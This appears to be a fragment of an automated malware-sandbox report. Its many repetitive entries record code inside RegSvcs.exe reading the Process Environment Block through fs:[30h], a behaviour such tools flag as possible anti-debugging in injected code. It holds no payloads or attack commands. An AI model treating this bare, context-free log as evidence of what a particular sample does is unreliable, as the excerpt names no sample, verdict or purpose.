          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C826B mov eax, dword ptr fs:[00000030h]14_2_016C826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4260 mov eax, dword ptr fs:[00000030h]14_2_016D4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4260 mov eax, dword ptr fs:[00000030h]14_2_016D4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4260 mov eax, dword ptr fs:[00000030h]14_2_016D4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A625D mov eax, dword ptr fs:[00000030h]14_2_017A625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178A250 mov eax, dword ptr fs:[00000030h]14_2_0178A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178A250 mov eax, dword ptr fs:[00000030h]14_2_0178A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6259 mov eax, dword ptr fs:[00000030h]14_2_016D6259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01758243 mov eax, dword ptr fs:[00000030h]14_2_01758243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01758243 mov ecx, dword ptr fs:[00000030h]14_2_01758243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA250 mov eax, dword ptr fs:[00000030h]14_2_016CA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C823B mov eax, dword ptr fs:[00000030h]14_2_016C823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02E1 mov eax, dword ptr fs:[00000030h]14_2_016E02E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02E1 mov eax, dword ptr fs:[00000030h]14_2_016E02E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02E1 mov eax, dword ptr fs:[00000030h]14_2_016E02E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A62D6 mov eax, dword ptr fs:[00000030h]14_2_017A62D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02A0 mov eax, dword ptr fs:[00000030h]14_2_016E02A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02A0 mov eax, dword ptr fs:[00000030h]14_2_016E02A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov ecx, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E284 mov eax, dword ptr fs:[00000030h]14_2_0170E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E284 mov eax, dword ptr fs:[00000030h]14_2_0170E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750283 mov eax, dword ptr fs:[00000030h]14_2_01750283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750283 mov eax, dword ptr fs:[00000030h]14_2_01750283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750283 mov eax, dword ptr fs:[00000030h]14_2_01750283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170656A mov eax, dword ptr fs:[00000030h]14_2_0170656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170656A mov eax, dword ptr fs:[00000030h]14_2_0170656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170656A mov eax, dword ptr fs:[00000030h]14_2_0170656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8550 mov eax, dword ptr fs:[00000030h]14_2_016D8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8550 mov eax, dword ptr fs:[00000030h]14_2_016D8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766500 mov eax, dword ptr fs:[00000030h]14_2_01766500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D25E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D65D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017505A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F45B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170E59C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D2582 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D2582 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01704588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175C460 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FA470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0178A456 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016C645D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F245A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170A430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016CC427 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016CE420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01756420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01708402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D04E5 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017044B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175A4B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D64AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0178A49A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D8770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01754755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01712750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175E75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D0750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0174C730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170273C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01700710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170C700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D0710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F27ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175E7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D47FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016DC7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017507C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D07AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017847A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177678E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01702674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016EC640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016EE627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01706620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01708620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E260B mov eax, dword ptr fs:[00000030h] (7 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01712619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0174E609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017506F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0174E6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170A6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017066B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D4690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175C97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F6962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01774978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0171096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0171096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0171096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01750946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A4940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0176892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175C912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016C8918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0174E908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017029F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175E9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017049D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179A9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017669C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D09AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017589B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017589B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01766870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175E872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01700854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E2840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D4859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F2835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175C810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179A8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FE8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A08C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175C89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D0887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016CCB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177EB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A2B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01784B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01778B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01766B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179AB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016C8B50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FEB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01798B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A4B00 mov eax, dword ptr fs:[00000030h]
